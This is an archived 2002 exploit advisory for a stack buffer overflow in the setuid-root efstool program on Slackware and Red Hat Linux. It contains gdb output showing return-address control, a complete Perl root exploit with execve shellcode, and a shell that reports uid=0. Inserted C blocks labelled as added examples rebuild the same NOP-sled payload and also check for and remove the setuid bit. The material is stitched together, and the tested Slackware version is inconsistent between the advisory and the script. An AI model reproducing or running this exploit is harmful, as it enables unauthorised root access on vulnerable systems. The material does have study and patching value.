efstool.txt

Posted Sep 12, 2002
Authored by NTFX | Site soldierx.com

Efstool local root exploit. A condition has been found in efstool, which is shipped with Red Hat and Slackware Linux (and possibly other distributions), through which, given the right environment, root privileges can be gained. Full research provided.

tags | exploit, local, root
systems | linux, redhat, slackware
SHA-256 | 35749dc21ecb4aaf67c6b4d31e62c494ff815452e4240da1bf2a8f9647bb5cab

               §+++++++++++++++++++++++++++++++++++++++++++++++§
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[
+++++++++++++++§+++_________________________________________+++§+++++++++++++++
\\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\//
\\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////
\\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://
\\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//
\\:::::::::::::::::::::::::::::: of ::::::::::::::::::::::::::::::://
\\ SOLDIERX.COM, LEGION2000 //
\\ September, 2002 //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
[ Author's E-mail - NTFX@SOLDIERX.COM ]
**********************************************************************
| The author hereby grants permission to reproduce, redistribute, |
| or include this file(s) in your file section, electronic or print |
| newsletter, or any other form of transmission that you choose, as |
| long as it is kept intact and whole, with no omissions, deletions, |
| or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com |
**********************************************************************

[L2K Advisory ef0001]
Feb 13th 02
EFSTOOL LOCAL ROOT
Author: ntfx <ntfx@legion2000.tk>
Legion2000 Security Research (c)
Soldierx Dot Com (c)
Web: http://legion200.security.nu
Web: http://soldierx.com
Note: I have previously not written any
advisories, so be patient.

What is Bonobo? (Bonobo is the package that contains efstool.)

Bonobo is a set of language- and system-independent CORBA interfaces
for creating reusable components, controls and compound documents.

The Bonobo distribution includes a Gtk+ based implementation of the
Bonobo interfaces, enabling developers to create reusable
components and applications that can be used to form more complex documents.

A condition has been found in efstool, which ships with
Red Hat Linux and Slackware Linux (and possibly others), through
which, given the right environment, root privileges can be gained.
Exploitation depends on the binary being installed setuid root.

If a user passes 3000 "A" characters as the argument, the
program segfaults, as shown below.

$ /usr/bin/efstool `perl -e 'print "A" x 3000'`
Segmentation fault
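The page does not include efstool's source, so the following is an added example of the bug class the crash above implies, not efstool's own code: an argument string copied into a fixed-size stack buffer with no length check, beside a bounded version that rejects oversized input. The buffer size (256), the function names and the `as_string` helper that builds the 3000-"A" input are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define ARG_BUF 256   /* assumed size of the local buffer; efstool's real size is unknown */

/* Vulnerable pattern (do not call with long input): strcpy() stops at the NUL
 * of 'arg', not at the end of 'buf'. A 3000-byte argument runs past 'buf' and
 * over the saved return address, which is why EIP ends up as 0x41414141. */
static int handle_arg_vulnerable(const char *arg)
{
    char buf[ARG_BUF];
    strcpy(buf, arg);
    return (int)strlen(buf);
}

/* Hardened pattern: measure against the buffer size first, reject anything that
 * does not fit (terminator included), then copy exactly that many bytes.
 * Returns the argument length, or -1 if it was rejected. */
static int handle_arg_bounded(const char *arg)
{
    char buf[ARG_BUF];
    size_t n = 0;
    while (n < sizeof buf && arg[n] != '\0')
        n++;
    if (n == sizeof buf)          /* no NUL within the buffer: too long */
        return -1;
    memcpy(buf, arg, n + 1);      /* n + 1 <= sizeof buf, NUL included */
    return (int)n;
}

/* Constructed input: the `perl -e 'print "A" x n'` argument from the advisory. */
static const char *as_string(size_t n)
{
    static char big[4096];
    if (n >= sizeof big)
        n = sizeof big - 1;
    memset(big, 'A', n);
    big[n] = '\0';
    return big;
}

int main(void)
{
    printf("bounded, 3 bytes:     %d\n", handle_arg_bounded("efs"));
    printf("bounded, 3000 bytes:  %d\n", handle_arg_bounded(as_string(3000)));
    printf("vulnerable, 3 bytes:  %d\n", handle_arg_vulnerable("efs"));
    /* handle_arg_vulnerable(as_string(3000)) is the crash shown in the advisory. */
    return 0;
}
```

The bounded version rejects rather than truncates: silently cutting an argument to 255 bytes would still let a caller smuggle a different path or option through, which matters more in a setuid program than in an ordinary one.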

Now we open the binary in gdb to see what
occurred.

$gdb /usr/bin/efstool
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)

The crash at 0x41414141 shows that the saved return address was
overwritten with our "A"s, so we control EIP. ESP at the time of the
crash gives us a starting guess for an address inside our buffer:
Return : 0xbfffe890
If the overwritten return address points into the NOP sled, execution
slides down the NOPs into the shellcode, which then spawns a shell.

The exact location of the buffer depends on the environment (argument
and environment sizes), so the offset from ESP has to be played with
for the exploit to work reliably, but an offset of around -1000 / -2000
should work.
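The following C program is an added example and is not the advisory's or kitkat.pl's own code. It lays out the buffer the way the exploit below does (NOP sled, the advisory's shellcode, then the guessed return address twice, little-endian) and shows, against an assumed buffer address, why a guess derived from ESP only works when it lands inside the sled. The ESP value and the shellcode bytes are the advisory's; the buffer base 0xbfffe000 used in main() and the function names are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The advisory's shellcode: jmp/call to locate "/bin/sh", then execve() and exit(). */
static const char shellcode[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3"
    "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff"
    "/bin/sh";
#define SHELLCODE_LEN (sizeof shellcode - 1)   /* 43 bytes; drop the C terminator */
#define ESP_AT_CRASH  0xbfffe890u              /* 'info reg esp' from the gdb session */

/* Little-endian helpers: x86 stores the low byte first, as pack('L') does. */
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v);       p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Lay out 'len' bytes of sled+shellcode followed by the guess twice:
 *   [0x90 ... 0x90][shellcode][guess][guess]
 * Returns the total size written, or 0 if len or cap is too small. */
size_t build_payload(uint32_t guess, size_t len, uint8_t *out, size_t cap)
{
    if (len < SHELLCODE_LEN)
        return 0;
    size_t sled  = len - SHELLCODE_LEN;
    size_t total = len + 2 * sizeof(uint32_t);
    if (cap < total)
        return 0;
    memset(out, 0x90, sled);                       /* NOP sled */
    memcpy(out + sled, shellcode, SHELLCODE_LEN);  /* shellcode at the end of the sled */
    put_le32(out + len, guess);                    /* lands on the saved return address */
    put_le32(out + len + 4, guess);                /* one slot further, for slack */
    return total;
}

/* A guess works only if it points inside the NOP sled; execution then slides into
 * the shellcode. 'buf_base' is where our buffer sits when the function returns.
 * The attacker does not know it exactly, which is why the offset from ESP has to
 * be tuned. */
int sled_hit(uint32_t buf_base, size_t len, uint32_t guess)
{
    uint32_t sled_end = buf_base + (uint32_t)(len - SHELLCODE_LEN);   /* exclusive */
    return guess >= buf_base && guess < sled_end;
}

int main(void)
{
    uint8_t buf[4096];
    uint32_t base = 0xbfffe000u;   /* assumed buffer address, for illustration only */
    size_t n = build_payload(ESP_AT_CRASH - 1000, 3000, buf, sizeof buf);
    printf("payload: %zu bytes, return slot = 0x%08x\n", n, get_le32(buf + 3000));
    for (int off = -3000; off <= 1000; off += 1000)
        printf("offset %5d -> 0x%08x %s\n", off, ESP_AT_CRASH + off,
               sled_hit(base, 3000, ESP_AT_CRASH + off) ? "in sled" : "miss");
    return 0;
}
```

With a 2957-byte sled the guess can be off by almost 3 KB and still work, which is what makes the crude "ESP plus an offset" approach viable; the guess just has to stay clear of the 43 shellcode bytes at the end and of anything below the buffer.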

I have done minimal testing on this, so if it doesn't work fully
do not come crying to me. It has been tested on Slackware 7.1.

Solution: remove the setuid bit from the program.
# chmod u-s /usr/bin/efstool
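To verify the fix, the program below is an added example (not part of the advisory) that checks whether a file still carries the setuid bit, whether it is setuid root specifically, and clears the bit the way `chmod u-s` does, keeping every other permission bit. The `make_setuid_tempfile` helper creates a constructed test subject in /tmp; the function names are assumptions.

```c
#define _XOPEN_SOURCE 700   /* mkstemp(), fchmod() under strict -std=c11 */
#include <sys/stat.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* 1 if the setuid bit is set on 'path', 0 if not, -1 if it cannot be stat'ed. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* 1 if the file is setuid AND owned by root, the combination this advisory needs;
 * a setuid file owned by anyone else only yields that owner's privileges. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return ((st.st_mode & S_ISUID) && st.st_uid == 0) ? 1 : 0;
}

/* Equivalent of 'chmod u-s path': clear S_ISUID, leave the other mode bits alone.
 * Returns 0 on success (also when the bit was already clear), -1 on error. */
int drop_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    if (!(st.st_mode & S_ISUID))
        return 0;
    return chmod(path, (st.st_mode & 07777) & ~S_ISUID);
}

/* Constructed test subject: an empty file in /tmp with mode 4755.
 * Returns its path, or NULL on failure. */
const char *make_setuid_tempfile(void)
{
    static char path[64];
    strcpy(path, "/tmp/efstool-checkXXXXXX");
    int fd = mkstemp(path);
    if (fd < 0)
        return NULL;
    int rc = fchmod(fd, 04755);
    close(fd);
    return rc == 0 ? path : NULL;
}

int main(int argc, char **argv)
{
    const char *target = argc > 1 ? argv[1] : "/usr/bin/efstool";
    int s = is_setuid_root(target);
    if (s < 0) {
        perror(target);
        return 1;
    }
    printf("%s: %s\n", target, s ? "setuid root (exploitable if unpatched)" : "not setuid root");
    return 0;
}
```

Run it against /usr/bin/efstool before and after the chmod; a package upgrade can reinstall the binary with the setuid bit, so the check is worth repeating after updates.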

Added: do not confuse this with the other efstool release. Our version was semi-released
back on Feb 13th, when the original discovery took place. I personally
do not like using SecurityFocus for releases and have never previously
bothered with it. - ntfx 10.09

Included is the example exploit.
--------------------------cut kitkat.pl---------------------------------
#!/usr/bin/perl
# Efstool local root exploit (Slackware 8.1)
# Author: ntfx <ntfx@legion2000.tk> Feb 13th 2002
# Legion2000 Security Research (c)
# Soldierx Dot Com
# WEB: HTTP://legion2000.security.nu
# WEB: HTTP://soldierx.com
# GREET: Legion2000SR, Soldierx.com, Kat
############################################
# Solution: chmod u-s efstool
############################################
use strict;
use warnings;

# An offset and the "kat" keyword are required. "0" is a valid offset,
# so test for presence rather than truth.
usage() unless defined $ARGV[0];

sub usage {
    print "USAGE: perl $0 <offset> kat\n";
    print "efstool local root by ntfx\n";
    print "Legion2000SR http://legion2000.security.nu\n";
    print "Soldierx http://soldierx.com\n";
    exit(0);
}

my $ret    = 0xbfffe890;   # ESP at the crash, as a number (the string "0xbfffe890" would numify to 0)
my $offset = $ARGV[0];     # e.g. -1000; adjust until the guess lands in the NOP sled
my $nop    = "\x90";
# execve("/bin/sh") shellcode; it patches "/bin/sh" into a NUL-terminated argv at runtime
my $ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
               "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
               "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
               "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
               "/bin/sh";
my $buffer = "";

if (defined $ARGV[1] && $ARGV[1] eq "kat") {
    my $len = 3000;
    $buffer  = $nop x ($len - length($ev1lc0de));   # NOP sled
    $buffer .= $ev1lc0de;                            # shellcode at the end of the sled
}
# Guessed return address twice, little-endian; 'L' (unsigned) keeps the high bit of 0xbfffxxxx
$buffer .= pack('L', $ret + $offset) x 2;

# List-form exec: no shell in between, so the raw shellcode bytes and "/bin/sh"
# reach efstool untouched. exec replaces this process, so nothing after it runs;
# if the payload works you are dropped into the shell it spawned.
exec("/usr/bin/efstool", $buffer) or die "exec failed: $!\n";
# This has been a SoldierX/Legion2000 Production.
--------------------------cut kitkat.pl---------------------------------

$ perl kitkat.pl -1000 kat
# id; uname -a
uid=0(root) gid=100(users) groups=100(users)
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown
#

As you can see, root privileges have been gained: id in the spawned shell
reports uid=0, and uname -a shows the system it was tested on.

ntfx <ntfx@legion2000.tk>
_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS A SOLDIERX PRODUCTION //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
© 2024 Packet Storm. All rights reserved.